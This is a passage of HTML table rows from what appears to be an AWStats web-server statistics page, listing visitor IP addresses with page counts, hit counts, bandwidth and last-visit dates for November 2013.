<tr><td class="aws">109.252.159.78</td><td>74</td><td>74</td><td>886.42 KB</td><td>30 Nov 2013 - 09:50</td></tr>
<tr><td class="aws">46.29.153.118</td><td>74</td><td>470</td><td>17.31 MB</td><td>29 Nov 2013 - 12:46</td></tr>
<tr><td class="aws">83.149.9.155</td><td>74</td><td>358</td><td>40.06 MB</td><td>30 Nov 2013 - 19:25</td></tr>
<tr><td class="aws">46.188.8.5</td><td>74</td><td>380</td><td>37.82 MB</td><td>29 Nov 2013 - 17:02</td></tr>
<tr><td class="aws">193.109.114.198</td><td>74</td><td>744</td><td>8.80 MB</td><td>28 Nov 2013 - 16:54</td></tr>
<tr><td class="aws">188.123.230.101</td><td>74</td><td>393</td><td>17.36 MB</td><td>20 Nov 2013 - 11:50</td></tr>
<tr><td class="aws">212.119.212.146</td><td>74</td><td>192</td><td>9.90 MB</td><td>19 Nov 2013 - 12:49</td></tr>
<tr><td class="aws">91.226.161.153</td><td>74</td><td>263</td><td>28.93 MB</td><td>20 Nov 2013 - 09:39</td></tr>
<tr><td class="aws">212.73.96.114</td><td>74</td><td>439</td><td>20.61 MB</td><td>27 Nov 2013 - 07:57</td></tr>
<tr><td class="aws">195.162.8.246</td><td>74</td><td>324</td><td>20.03 MB</td><td>29 Nov 2013 - 20:08</td></tr>
<tr><td class="aws">188.255.45.7</td><td>74</td><td>154</td><td>17.65 MB</td><td>04 Nov 2013 - 20:45</td></tr>
<tr><td class="aws">195.230.92.66</td><td>74</td><td>210</td><td>4.99 MB</td><td>29 Nov 2013 - 13:14</td></tr>
<tr><td class="aws">83.149.8.85</td><td>74</td><td>334</td><td>14.14 MB</td><td>29 Nov 2013 - 16:11</td></tr>
<tr><td class="aws">31.40.96.11</td><td>74</td><td>455</td><td>19.69 MB</td><td>30 Nov 2013 - 22:07</td></tr>
<tr><td class="aws">193.219.127.227</td><td>74</td><td>501</td><td>24.08 MB</td><td>28 Nov 2013 - 12:18</td></tr>
<tr><td class="aws">213.165.38.69</td><td>74</td><td>74</td><td>890.32 KB</td><td>04 Nov 2013 - 03:41</td></tr>
<tr><td class="aws">83.69.208.90</td><td>73</td><td>156</td><td>6.93 MB</td><td>20 Nov 2013 - 13:28</td></tr>
<tr><td class="aws">46.39.229.210</td><td>73</td><td>254</td><td>18.25 MB</td><td>19 Nov 2013 - 22:40</td></tr>
<tr><td class="aws">109.188.124.53</td><td>73</td><td>217</td><td>8.92 MB</td><td>29 Nov 2013 - 13:37</td></tr>
<tr><td class="aws">46.188.4.2</td><td>73</td><td>308</td><td>13.25 MB</td><td>25 Nov 2013 - 14:44</td></tr>
<tr><td class="aws">46.188.1.52</td><td>73</td><td>108</td><td>1.60 MB</td><td>21 Nov 2013 - 08:51</td></tr>
<tr><td class="aws">46.242.119.89</td><td>73</td><td>223</td><td>29.38 MB</td><td>12 Nov 2013 - 17:45</td></tr>
<tr><td class="aws">83.149.8.214</td><td>73</td><td>355</td><td>12.15 MB</td><td>29 Nov 2013 - 21:48</td></tr>
<tr><td class="aws">79.141.229.62</td><td>73</td><td>283</td><td>25.55 MB</td><td>19 Nov 2013 - 10:09</td></tr>
<tr><td class="aws">46.183.178.162</td><td>73</td><td>133</td><td>4.58 MB</td><td>24 Nov 2013 - 15:05</td></tr>
<tr><td class="aws">195.19.43.53</td><td>73</td><td>294</td><td>65.26 MB</td><td>21 Nov 2013 - 11:52</td></tr>
<tr><td class="aws">91.79.63.32</td><td>72</td><td>276</td><td>21.35 MB</td><td>26 Nov 2013 - 19:04</td></tr>
<tr><td class="aws">46.39.230.216</td><td>72</td><td>158</td><td>18.57 MB</td><td>21 Nov 2013 - 21:21</td></tr>
<tr><td class="aws">193.232.194.4</td><td>72</td><td>174</td><td>4.79 MB</td><td>28 Nov 2013 - 17:43</td></tr>
<tr><td class="aws">46.188.14.3</td><td>72</td><td>447</td><td>20.39 MB</td><td>28 Nov 2013 - 12:19</td></tr>
<tr><td class="aws">37.190.53.77</td><td>72</td><td>174</td><td>9.28 MB</td><td>29 Nov 2013 - 23:13</td></tr>
<tr><td class="aws">95.143.213.56</td><td>72</td><td>128</td><td>11.88 MB</td><td>30 Nov 2013 - 15:00</td></tr>
<tr><td class="aws">193.232.49.195</td><td>72</td><td>612</td><td>22.74 MB</td><td>25 Nov 2013 - 13:45</td></tr>
<tr><td class="aws">144.206.178.58</td><td>72</td><td>298</td><td>23.25 MB</td><td>26 Nov 2013 - 12:35</td></tr>
<tr><td class="aws">95.143.14.125</td><td>72</td><td>72</td><td>731.79 KB</td><td>29 Nov 2013 - 16:40</td></tr>
<tr><td class="aws">87.251.152.250</td><td>72</td><td>328</td><td>23.88 MB</td><td>27 Nov 2013 - 15:40</td></tr>
<tr><td class="aws">178.214.37.57</td><td>72</td><td>250</td><td>37.63 MB</td><td>28 Nov 2013 - 20:55</td></tr>
<tr><td class="aws">77.105.184.196</td><td>72</td><td>99</td><td>1.91 MB</td><td>30 Nov 2013 - 18:23</td></tr>
<tr><td class="aws">188.254.8.42</td><td>72</td><td>103</td><td>1.54 MB</td><td>29 Nov 2013 - 15:29</td></tr>
<tr><td class="aws">83.149.9.170</td><td>72</td><td>443</td><td>30.40 MB</td><td>30 Nov 2013 - 14:24</td></tr>
<tr><td class="aws">178.251.136.142</td><td>72</td><td>730</td><td>62.22 MB</td><td>27 Nov 2013 - 22:12</td></tr>
<tr><td class="aws">37.113.249.61</td><td>72</td><td>165</td><td>18.35 MB</td><td>29 Nov 2013 - 20:27</td></tr>
<tr><td class="aws">94.159.16.3</td><td>72</td><td>217</td><td>8.80 MB</td><td>20 Nov 2013 - 11:42</td></tr>
<tr><td class="aws">109.188.125.58</td><td>72</td><td>305</td><td>18.88 MB</td><td>18 Nov 2013 - 16:20</td></tr>
<tr><td class="aws">109.188.127.45</td><td>71</td><td>528</td><td>32.85 MB</td><td>29 Nov 2013 - 08:54</td></tr>
<tr><td class="aws">77.41.74.129</td><td>71</td><td>173</td><td>11.21 MB</td><td>26 Nov 2013 - 19:57</td></tr>
<tr><td class="aws">83.234.227.2</td><td>71</td><td>239</td><td>27.11 MB</td><td>18 Nov 2013 - 15:06</td></tr>
<tr><td class="aws">188.123.245.42</td><td>71</td><td>222</td><td>8.60 MB</td><td>14 Nov 2013 - 10:31</td></tr>
<tr><td class="aws">194.67.128.194</td><td>71</td><td>210</td><td>13.19 MB</td><td>22 Nov 2013 - 11:11</td></tr>
<tr><td class="aws">93.80.65.17</td><td>71</td><td>71</td><td>725.58 KB</td><td>12 Nov 2013 - 22:09</td></tr>
<tr><td class="aws">90.155.167.129</td><td>71</td><td>190</td><td>12.68 MB</td><td>17 Nov 2013 - 22:09</td></tr>
<tr><td class="aws">91.210.84.250</td><td>71</td><td>270</td><td>22.19 MB</td><td>27 Nov 2013 - 21:09</td></tr>
<tr><td class="aws">109.197.112.71</td><td>71</td><td>412</td><td>13.58 MB</td><td>30 Nov 2013 - 10:08</td></tr>
<tr><td class="aws">109.188.124.63</td><td>71</td><td>437</td><td>22.16 MB</td><td>28 Nov 2013 - 13:11</td></tr>
<tr><td class="aws">80.71.241.13</td><td>71</td><td>535</td><td>25.94 MB</td><td>28 Nov 2013 - 12:49</td></tr>
<tr><td class="aws">188.123.245.4</td><td>71</td><td>413</td><td>13.75 MB</td><td>28 Nov 2013 - 21:22</td></tr>
<tr><td class="aws">94.102.56.236</td><td>71</td><td>71</td><td>3.12 MB</td><td>26 Nov 2013 - 05:18</td></tr>
<tr><td class="aws">95.73.70.142</td><td>71</td><td>152</td><td>5.00 MB</td><td>25 Nov 2013 - 15:03</td></tr>
<tr><td class="aws">95.26.58.61</td><td>71</td><td>131</td><td>3.54 MB</td><td>14 Nov 2013 - 21:10</td></tr>
<tr><td class="aws">37.110.126.101</td><td>70</td><td>95</td><td>1.44 MB</td><td>23 Nov 2013 - 21:41</td></tr>
<tr><td class="aws">87.255.7.90</td><td>70</td><td>221</td><td>5.32 MB</td><td>20 Nov 2013 - 13:56</td></tr>
<tr><td class="aws">94.143.40.45</td><td>70</td><td>309</td><td>9.92 MB</td><td>27 Nov 2013 - 11:47</td></tr>
<tr><td class="aws">212.11.144.86</td><td>70</td><td>235</td><td>20.25 MB</td><td>21 Nov 2013 - 08:25</td></tr>
<tr><td class="aws">92.243.183.6</td><td>70</td><td>248</td><td>14.80 MB</td><td>23 Nov 2013 - 20:11</td></tr>
<tr><td class="aws">83.149.8.177</td><td>70</td><td>358</td><td>17.26 MB</td><td>26 Nov 2013 - 12:46</td></tr>
<tr><td class="aws">217.151.76.226</td><td>70</td><td>223</td><td>9.94 MB</td><td>12 Nov 2013 - 12:30</td></tr>
<tr><td class="aws">176.108.170.72</td><td>70</td><td>70</td><td>827.56 KB</td><td>30 Nov 2013 - 19:06</td></tr>
<tr><td class="aws">193.232.69.1</td><td>70</td><td>205</td><td>3.44 MB</td><td>25 Nov 2013 - 09:20</td></tr>
<tr><td class="aws">195.74.82.153</td><td>69</td><td>376</td><td>33.01 MB</td><td>27 Nov 2013 - 13:56</td></tr>
<tr><td class="aws">94.29.127.81</td><td>69</td><td>380</td><td>31.77 MB</td><td>27 Nov 2013 - 17:07</td></tr>
<tr><td class="aws">95.25.221.31</td><td>69</td><td>222</td><td>22.64 MB</td><td>04 Nov 2013 - 08:35</td></tr>
<tr><td class="aws">217.76.34.12</td><td>69</td><td>128</td><td>6.60 MB</td><td>27 Nov 2013 - 15:56</td></tr>
<tr><td class="aws">109.234.14.82</td><td>69</td><td>440</td><td>16.18 MB</td><td>29 Nov 2013 - 09:01</td></tr>
<tr><td class="aws">79.120.42.162</td><td>69</td><td>69</td><td>722.14 KB</td><td>26 Nov 2013 - 12:29</td></tr>
<tr><td class="aws">94.158.169.106</td><td>69</td><td>321</td><td>23.59 MB</td><td>28 Nov 2013 - 12:22</td></tr>
<tr><td class="aws">94.79.4.21</td><td>69</td><td>240</td><td>10.42 MB</td><td>28 Nov 2013 - 14:55</td></tr>
<tr><td class="aws">37.204.209.108</td><td>69</td><td>270</td><td>15.75 MB</td><td>17 Nov 2013 - 21:21</td></tr>
<tr><td class="aws">37.204.151.112</td><td>69</td><td>99</td><td>1.49 MB</td><td>30 Nov 2013 - 23:01</td></tr>
<tr><td class="aws">128.69.249.250</td><td>69</td><td>123</td><td>13.24 MB</td><td>20 Nov 2013 - 21:09</td></tr>
<tr><td class="aws">109.195.114.68</td><td>69</td><td>93</td><td>1.67 MB</td><td>29 Nov 2013 - 14:22</td></tr>
<tr><td class="aws">193.169.32.8</td><td>69</td><td>346</td><td>12.83 MB</td><td>26 Nov 2013 - 11:46</td></tr>
<tr><td class="aws">95.167.139.131</td><td>69</td><td>246</td><td>8.22 MB</td><td>30 Nov 2013 - 15:33</td></tr>
<tr><td class="aws">185.8.127.102</td><td>69</td><td>94</td><td>1.64 MB</td><td>11 Nov 2013 - 16:45</td></tr>
<tr><td class="aws">37.110.51.102</td><td>68</td><td>215</td><td>36.39 MB</td><td>29 Nov 2013 - 13:43</td></tr>
<tr><td class="aws">77.37.254.162</td><td>68</td><td>340</td><td>25.65 MB</td><td>20 Nov 2013 - 13:12</td></tr>
<tr><td class="aws">194.59.186.11</td><td>68</td><td>282</td><td>10.69 MB</td><td>27 Nov 2013 - 11:07</td></tr>
<tr><td class="aws">217.10.38.74</td><td>68</td><td>340</td><td>10.54 MB</td><td>19 Nov 2013 - 18:33</td></tr>
<tr><td class="aws">92.243.166.8</td><td>68</td><td>144</td><td>4.81 MB</td><td>25 Nov 2013 - 21:17</td></tr>
<tr><td class="aws">128.72.253.236</td><td>68</td><td>170</td><td>30.60 MB</td><td>18 Nov 2013 - 21:29</td></tr>
<tr><td class="aws">199.187.122.91</td><td>68</td><td>68</td><td>2.91 MB</td><td>21 Nov 2013 - 23:48</td></tr>
<tr><td class="aws">83.149.9.82</td><td>68</td><td>438</td><td>49.47 MB</td><td>29 Nov 2013 - 12:21</td></tr>
<tr><td class="aws">195.91.136.188</td><td>68</td><td>180</td><td>19.13 MB</td><td>15 Nov 2013 - 12:11</td></tr>
<tr><td class="aws">212.100.143.42</td><td>68</td><td>68</td><td>789.21 KB</td><td>29 Nov 2013 - 15:47</td></tr>
<tr><td class="aws">95.143.213.187</td><td>68</td><td>299</td><td>29.18 MB</td><td>14 Nov 2013 - 12:08</td></tr>
<tr><td class="aws">83.149.8.54</td><td>68</td><td>234</td><td>12.66 MB</td><td>29 Nov 2013 - 09:09</td></tr>
<tr><td class="aws">46.188.38.206</td><td>67</td><td>94</td><td>1.34 MB</td><td>17 Nov 2013 - 16:01</td></tr>
<tr><td class="aws">80.250.173.113</td><td>67</td><td>106</td><td>5.93 MB</td><td>27 Nov 2013 - 09:45</td></tr>
<tr><td class="aws">94.29.127.37</td><td>67</td><td>286</td><td>16.43 MB</td><td>28 Nov 2013 - 13:52</td></tr>
<tr><td class="aws">82.138.15.68</td><td>67</td><td>270</td><td>18.48 MB</td><td>27 Nov 2013 - 09:18</td></tr>
<tr><td class="aws">62.117.122.10</td><td>67</td><td>337</td><td>10.79 MB</td><td>29 Nov 2013 - 08:18</td></tr>
<tr><td class="aws">83.219.230.52</td><td>67</td><td>315</td><td>6.43 MB</td><td>18 Nov 2013 - 16:44</td></tr>
<tr><td class="aws">91.78.115.185</td><td>67</td><td>67</td><td>863.67 KB</td><td>19 Nov 2013 - 19:52</td></tr>
<tr><td class="aws">82.145.208.145</td><td>67</td><td>538</td><td>17.06 MB</td><td>29 Nov 2013 - 14:40</td></tr>
<tr><td class="aws">213.251.211.193</td><td>67</td><td>413</td><td>110.86 MB</td><td>28 Nov 2013 - 15:40</td></tr>
<tr><td class="aws">90.155.133.98</td><td>67</td><td>221</td><td>17.93 MB</td><td>26 Nov 2013 - 19:49</td></tr>
<tr><td class="aws">217.118.78.34</td><td>67</td><td>189</td><td>19.44 MB</td><td>09 Nov 2013 - 13:52</td></tr>
<tr><td class="aws">83.102.176.156</td><td>67</td><td>483</td><td>37.71 MB</td><td>27 Nov 2013 - 12:21</td></tr>
<tr><td class="aws">46.39.34.146</td><td>67</td><td>214</td><td>19.67 MB</td><td>13 Nov 2013 - 20:38</td></tr>
<tr><td class="aws">77.232.157.167</td><td>67</td><td>107</td><td>2.58 MB</td><td>26 Nov 2013 - 23:07</td></tr>
<tr><td class="aws">94.158.169.73</td><td>67</td><td>135</td><td>5.26 MB</td><td>27 Nov 2013 - 18:35</td></tr>
<tr><td class="aws">217.26.22.124</td><td>67</td><td>67</td><td>851.21 KB</td><td>30 Nov 2013 - 21:44</td></tr>
<tr><td class="aws">212.41.32.102</td><td>67</td><td>315</td><td>11.18 MB</td><td>30 Nov 2013 - 13:18</td></tr>
<tr><td class="aws">83.149.9.68</td><td>67</td><td>249</td><td>11.56 MB</td><td>30 Nov 2013 - 23:58</td></tr>
<tr><td class="aws">46.249.19.202</td><td>67</td><td>211</td><td>4.60 MB</td><td>15 Nov 2013 - 15:03</td></tr>
<tr><td class="aws">213.87.135.97</td><td>67</td><td>178</td><td>4.15 MB</td><td>28 Nov 2013 - 16:11</td></tr>
<tr><td class="aws">62.118.14.122</td><td>66</td><td>66</td><td>657.50 KB</td><td>29 Nov 2013 - 14:23</td></tr>
<tr><td class="aws">89.175.180.105</td><td>66</td><td>271</td><td>10.10 MB</td><td>26 Nov 2013 - 09:25</td></tr>
<tr><td class="aws">31.3.22.130</td><td>66</td><td>344</td><td>15.97 MB</td><td>30 Nov 2013 - 12:39</td></tr>
<tr><td class="aws">78.107.253.160</td><td>66</td><td>326</td><td>21.48 MB</td><td>29 Nov 2013 - 09:48</td></tr>
<tr><td class="aws">37.204.40.210</td><td>66</td><td>202</td><td>3.37 MB</td><td>05 Nov 2013 - 23:16</td></tr>
<tr><td class="aws">83.149.210.168</td><td>66</td><td>401</td><td>17.39 MB</td><td>18 Nov 2013 - 12:58</td></tr>
<tr><td class="aws">94.228.204.110</td><td>66</td><td>242</td><td>13.78 MB</td><td>20 Nov 2013 - 11:05</td></tr>
<tr><td class="aws">78.24.216.160</td><td>66</td><td>66</td><td>840.73 KB</td><td>14 Nov 2013 - 20:33</td></tr>
<tr><td class="aws">217.117.112.147</td><td>66</td><td>388</td><td>17.80 MB</td><td>25 Nov 2013 - 22:59</td></tr>
<tr><td class="aws">212.41.43.30</td><td>66</td><td>175</td><td>16.97 MB</td><td>19 Nov 2013 - 21:17</td></tr>
<tr><td class="aws">81.95.25.37</td><td>66</td><td>213</td><td>18.20 MB</td><td>18 Nov 2013 - 14:03</td></tr>
<tr><td class="aws">109.188.127.43</td><td>66</td><td>426</td><td>16.43 MB</td><td>28 Nov 2013 - 20:19</td></tr>
<tr><td class="aws">109.72.73.99</td><td>66</td><td>100</td><td>6.47 MB</td><td>29 Nov 2013 - 13:56</td></tr>
<tr><td class="aws">92.243.181.102</td><td>66</td><td>176</td><td>6.86 MB</td><td>24 Nov 2013 - 15:25</td></tr>
<tr><td class="aws">109.252.19.176</td><td>66</td><td>202</td><td>15.53 MB</td><td>26 Nov 2013 - 15:54</td></tr>
<tr><td class="aws">188.123.248.5</td><td>66</td><td>66</td><td>717.91 KB</td><td>30 Nov 2013 - 23:03</td></tr>
<tr><td class="aws">91.79.4.93</td><td>66</td><td>258</td><td>7.01 MB</td><td>09 Nov 2013 - 10:51</td></tr>
<tr><td class="aws">185.26.180.103</td><td>65</td><td>315</td><td>8.94 MB</td><td>14 Nov 2013 - 09:25</td></tr>
<tr><td class="aws">195.91.239.65</td><td>65</td><td>236</td><td>4.86 MB</td><td>15 Nov 2013 - 17:46</td></tr>
<tr><td class="aws">81.211.14.54</td><td>65</td><td>271</td><td>4.69 MB</td><td>26 Nov 2013 - 14:53</td></tr>
<tr><td class="aws">213.87.141.218</td><td>65</td><td>243</td><td>19.99 MB</td><td>15 Nov 2013 - 12:20</td></tr>
<tr><td class="aws">89.208.228.130</td><td>65</td><td>593</td><td>8.79 MB</td><td>19 Nov 2013 - 21:05</td></tr>
<tr><td class="aws">94.143.42.57</td><td>65</td><td>65</td><td>725.96 KB</td><td>20 Nov 2013 - 08:52</td></tr>
<tr><td class="aws">81.9.56.64</td><td>65</td><td>231</td><td>13.77 MB</td><td>09 Nov 2013 - 19:53</td></tr>
<tr><td class="aws">37.190.51.58</td><td>65</td><td>91</td><td>2.30 MB</td><td>23 Nov 2013 - 19:54</td></tr>
<tr><td class="aws">95.128.241.68</td><td>65</td><td>396</td><td>16.78 MB</td><td>30 Nov 2013 - 16:24</td></tr>
<tr><td class="aws">176.14.58.49</td><td>65</td><td>65</td><td>676.95 KB</td><td>16 Nov 2013 - 18:55</td></tr>
<tr><td class="aws">188.123.245.7</td><td>65</td><td>376</td><td>40.29 MB</td><td>27 Nov 2013 - 08:00</td></tr>
<tr><td class="aws">83.237.210.237</td><td>65</td><td>115</td><td>13.48 MB</td><td>01 Nov 2013 - 15:54</td></tr>
<tr><td class="aws">89.207.94.145</td><td>65</td><td>387</td><td>48.00 MB</td><td>25 Nov 2013 - 17:06</td></tr>
<tr><td class="aws">109.173.81.214</td><td>65</td><td>130</td><td>3.24 MB</td><td>01 Nov 2013 - 19:07</td></tr>
<tr><td class="aws">83.167.111.139</td><td>65</td><td>245</td><td>9.16 MB</td><td>21 Nov 2013 - 14:42</td></tr>
<tr><td class="aws">62.231.30.238</td><td>65</td><td>65</td><td>2.64 MB</td><td>29 Nov 2013 - 15:41</td></tr>
<tr><td class="aws">94.29.23.70</td><td>65</td><td>1006</td><td>5.06 MB</td><td>14 Nov 2013 - 12:33</td></tr>
<tr><td class="aws">83.149.8.47</td><td>65</td><td>265</td><td>10.60 MB</td><td>30 Nov 2013 - 14:09</td></tr>
<tr><td class="aws">213.141.247.145</td><td>65</td><td>65</td><td>775.32 KB</td><td>25 Nov 2013 - 16:01</td></tr>
<tr><td class="aws">95.167.130.202</td><td>65</td><td>324</td><td>13.58 MB</td><td>15 Nov 2013 - 14:35</td></tr>
<tr><td class="aws">188.32.86.179</td><td>65</td><td>437</td><td>17.45 MB</td><td>10 Nov 2013 - 21:36</td></tr>
<tr><td class="aws">128.72.226.189</td><td>65</td><td>168</td><td>33.44 MB</td><td>06 Nov 2013 - 17:17</td></tr>
<tr><td class="aws">91.207.7.221</td><td>65</td><td>65</td><td>2.88 MB</td><td>20 Nov 2013 - 02:18</td></tr>
<tr><td class="aws">80.82.64.242</td><td>65</td><td>65</td><td>2.85 MB</td><td>27 Nov 2013 - 11:08</td></tr>
<tr><td class="aws">83.149.8.154</td><td>65</td><td>369</td><td>15.02 MB</td><td>30 Nov 2013 - 01:04</td></tr>
<tr><td class="aws">95.221.165.13</td><td>65</td><td>344</td><td>19.07 MB</td><td>25 Nov 2013 - 22:09</td></tr>
<tr><td class="aws">109.188.125.73</td><td>65</td><td>164</td><td>13.43 MB</td><td>18 Nov 2013 - 16:18</td></tr>
<tr><td class="aws">109.72.227.75</td><td>65</td><td>65</td><td>671.33 KB</td><td>29 Nov 2013 - 16:13</td></tr>
<tr><td class="aws">83.149.8.216</td><td>65</td><td>329</td><td>28.42 MB</td><td>19 Nov 2013 - 16:27</td></tr>
<tr><td class="aws">83.149.9.201</td><td>64</td><td>486</td><td>32.52 MB</td><td>19 Nov 2013 - 11:51</td></tr>
<tr><td class="aws">188.191.114.5</td><td>64</td><td>437</td><td>8.95 MB</td><td>20 Nov 2013 - 14:55</td></tr>
<tr><td class="aws">109.188.127.51</td><td>64</td><td>184</td><td>14.82 MB</td><td>27 Nov 2013 - 21:18</td></tr>
<tr><td class="aws">193.28.44.23</td><td>64</td><td>356</td><td>16.40 MB</td><td>29 Nov 2013 - 13:17</td></tr>
<tr><td class="aws">46.188.18.6</td><td>64</td><td>287</td><td>24.09 MB</td><td>27 Nov 2013 - 16:48</td></tr>
<tr><td class="aws">188.191.161.25</td><td>64</td><td>1067</td><td>28.07 MB</td><td>30 Nov 2013 - 17:38</td></tr>
<tr><td class="aws">80.251.127.228</td><td>64</td><td>144</td><td>19.62 MB</td><td>27 Nov 2013 - 22:45</td></tr>
<tr><td class="aws">212.74.240.43</td><td>64</td><td>214</td><td>20.29 MB</td><td>27 Nov 2013 - 13:56</td></tr>
<tr><td class="aws">94.198.194.195</td><td>64</td><td>168</td><td>15.08 MB</td><td>20 Nov 2013 - 12:55</td></tr>
<tr><td class="aws">82.142.157.22</td><td>64</td><td>362</td><td>24.38 MB</td><td>22 Nov 2013 - 15:14</td></tr>
<tr><td class="aws">83.149.8.141</td><td>64</td><td>378</td><td>22.97 MB</td><td>30 Nov 2013 - 21:17</td></tr>
<tr><td class="aws">46.38.37.245</td><td>64</td><td>203</td><td>16.70 MB</td><td>17 Nov 2013 - 18:55</td></tr>
<tr><td class="aws">176.107.84.162</td><td>64</td><td>296</td><td>68.20 MB</td><td>07 Nov 2013 - 17:05</td></tr>
<tr><td class="aws">94.158.161.91</td><td>64</td><td>337</td><td>30.40 MB</td><td>19 Nov 2013 - 19:29</td></tr>
<tr><td class="aws">188.32.50.189</td><td>64</td><td>203</td><td>42.50 MB</td><td>01 Nov 2013 - 20:51</td></tr>
<tr><td class="aws">188.123.231.82</td><td>64</td><td>303</td><td>24.58 MB</td><td>22 Nov 2013 - 20:30</td></tr>
<tr><td class="aws">88.210.46.66</td><td>64</td><td>308</td><td>25.09 MB</td><td>25 Nov 2013 - 13:52</td></tr>
<tr><td class="aws">83.149.8.92</td><td>64</td><td>289</td><td>11.95 MB</td><td>25 Nov 2013 - 23:22</td></tr>
<tr><td class="aws">62.105.139.38</td><td>64</td><td>117</td><td>1.70 MB</td><td>06 Nov 2013 - 09:47</td></tr>
<tr><td class="aws">82.145.208.115</td><td>64</td><td>315</td><td>11.85 MB</td><td>28 Nov 2013 - 07:25</td></tr>
<tr><td class="aws">77.232.15.84</td><td>64</td><td>234</td><td>2.91 MB</td><td>11 Nov 2013 - 17:17</td></tr>
<tr><td class="aws">188.123.230.124</td><td>64</td><td>205</td><td>7.70 MB</td><td>30 Nov 2013 - 23:21</td></tr>
<tr><td class="aws">94.79.3.162</td><td>64</td><td>64</td><td>2.55 MB</td><td>15 Nov 2013 - 10:31</td></tr>
<tr><td class="aws">195.218.189.18</td><td>64</td><td>315</td><td>7.82 MB</td><td>08 Nov 2013 - 11:03</td></tr>
<tr><td class="aws">188.65.130.210</td><td>64</td><td>89</td><td>1.29 MB</td><td>14 Nov 2013 - 15:37</td></tr>
<tr><td class="aws">89.175.170.215</td><td>64</td><td>326</td><td>21.11 MB</td><td>26 Nov 2013 - 09:32</td></tr>
<tr><td class="aws">92.37.255.165</td><td>63</td><td>138</td><td>4.57 MB</td><td>21 Nov 2013 - 23:49</td></tr>
<tr><td class="aws">213.79.119.213</td><td>63</td><td>169</td><td>12.69 MB</td><td>29 Nov 2013 - 14:40</td></tr>
<tr><td class="aws">94.253.15.157</td><td>63</td><td>63</td><td>805.10 KB</td><td>29 Nov 2013 - 14:06</td></tr>
<tr><td class="aws">46.188.9.172</td><td>63</td><td>246</td><td>12.53 MB</td><td>30 Nov 2013 - 23:03</td></tr>
<tr><td class="aws">5.228.253.166</td><td>63</td><td>136</td><td>12.19 MB</td><td>28 Nov 2013 - 15:05</td></tr>
<tr><td class="aws">81.200.24.170</td><td>63</td><td>88</td><td>680.12 KB</td><td>30 Nov 2013 - 23:47</td></tr>
<tr><td class="aws">77.108.104.50</td><td>63</td><td>213</td><td>14.83 MB</td><td>25 Nov 2013 - 15:11</td></tr>
<tr><td class="aws">95.221.205.62</td><td>63</td><td>110</td><td>12.57 MB</td><td>23 Nov 2013 - 01:19</td></tr>
<tr><td class="aws">109.188.126.53</td><td>63</td><td>273</td><td>13.47 MB</td><td>25 Nov 2013 - 14:29</td></tr>
<tr><td class="aws">91.78.198.47</td><td>63</td><td>235</td><td>11.19 MB</td><td>30 Nov 2013 - 20:49</td></tr>
<tr><td class="aws">109.188.124.51</td><td>63</td><td>234</td><td>6.06 MB</td><td>13 Nov 2013 - 09:36</td></tr>
<tr><td class="aws">95.31.44.13</td><td>63</td><td>63</td><td>660.22 KB</td><td>29 Nov 2013 - 13:22</td></tr>
<tr><td class="aws">92.243.182.2</td><td>63</td><td>325</td><td>29.87 MB</td><td>28 Nov 2013 - 11:31</td></tr>
<tr><td class="aws">213.33.183.50</td><td>63</td><td>169</td><td>7.01 MB</td><td>18 Nov 2013 - 13:52</td></tr>
<tr><td class="aws">213.171.37.27</td><td>63</td><td>175</td><td>32.65 MB</td><td>13 Nov 2013 - 11:46</td></tr>
<tr><td class="aws">109.188.124.76</td><td>63</td><td>120</td><td>21.57 MB</td><td>14 Nov 2013 - 07:47</td></tr>
<tr><td class="aws">82.138.34.7</td><td>63</td><td>187</td><td>6.54 MB</td><td>28 Nov 2013 - 15:24</td></tr>
<tr><td class="aws">178.236.244.243</td><td>63</td><td>163</td><td>16.40 MB</td><td>20 Nov 2013 - 09:29</td></tr>
<tr><td class="aws">87.245.155.170</td><td>63</td><td>356</td><td>6.98 MB</td><td>29 Nov 2013 - 12:57</td></tr>
<tr><td class="aws">83.149.8.152</td><td>63</td><td>286</td><td>11.26 MB</td><td>28 Nov 2013 - 17:19</td></tr>
<tr><td class="aws">83.149.8.68</td><td>63</td><td>255</td><td>18.04 MB</td><td>28 Nov 2013 - 16:03</td></tr>
<tr><td class="aws">83.149.210.67</td><td>63</td><td>388</td><td>21.83 MB</td><td>22 Nov 2013 - 12:11</td></tr>
<tr><td class="aws">95.26.158.11</td><td>63</td><td>63</td><td>685.12 KB</td><td>28 Nov 2013 - 22:18</td></tr>
<tr><td class="aws">194.186.187.222</td><td>63</td><td>348</td><td>35.34 MB</td><td>11 Nov 2013 - 21:44</td></tr>
<tr><td class="aws">37.190.20.64</td><td>63</td><td>63</td><td>689.20 KB</td><td>20 Nov 2013 - 20:37</td></tr>
<tr><td class="aws">46.188.126.179</td><td>62</td><td>168</td><td>3.22 MB</td><td>30 Nov 2013 - 13:25</td></tr>
<tr><td class="aws">92.243.182.40</td><td>62</td><td>330</td><td>39.26 MB</td><td>27 Nov 2013 - 18:57</td></tr>
<tr><td class="aws">176.193.142.234</td><td>62</td><td>142</td><td>3.98 MB</td><td>24 Nov 2013 - 12:43</td></tr>
<tr><td class="aws">89.22.28.80</td><td>62</td><td>62</td><td>809.51 KB</td><td>28 Nov 2013 - 19:51</td></tr>
<tr><td class="aws">83.220.239.87</td><td>62</td><td>210</td><td>14.10 MB</td><td>15 Nov 2013 - 14:07</td></tr>
<tr><td class="aws">37.144.101.155</td><td>62</td><td>62</td><td>639.84 KB</td><td>21 Nov 2013 - 10:04</td></tr>
<tr><td class="aws">176.9.35.207</td><td>62</td><td>62</td><td>725.93 KB</td><td>08 Nov 2013 - 14:31</td></tr>
<tr><td class="aws">193.151.0.13</td><td>62</td><td>413</td><td>39.59 MB</td><td>28 Nov 2013 - 09:04</td></tr>
<tr><td class="aws">93.185.150.69</td><td>62</td><td>92</td><td>1.38 MB</td><td>26 Nov 2013 - 09:56</td></tr>
<tr><td class="aws">217.26.6.79</td><td>62</td><td>324</td><td>29.03 MB</td><td>19 Nov 2013 - 13:42</td></tr>
<tr><td class="aws">95.72.128.154</td><td>62</td><td>146</td><td>15.31 MB</td><td>30 Nov 2013 - 21:22</td></tr>
<tr><td class="aws">194.190.22.1</td><td>62</td><td>337</td><td>14.54 MB</td><td>29 Nov 2013 - 10:49</td></tr>
<tr><td class="aws">62.217.168.10</td><td>62</td><td>62</td><td>787.72 KB</td><td>29 Nov 2013 - 16:03</td></tr>
<tr><td class="aws">178.213.192.35</td><td>62</td><td>332</td><td>11.27 MB</td><td>29 Nov 2013 - 22:15</td></tr>
<tr><td class="aws">176.195.111.154</td><td>62</td><td>120</td><td>3.23 MB</td><td>27 Nov 2013 - 07:01</td></tr>
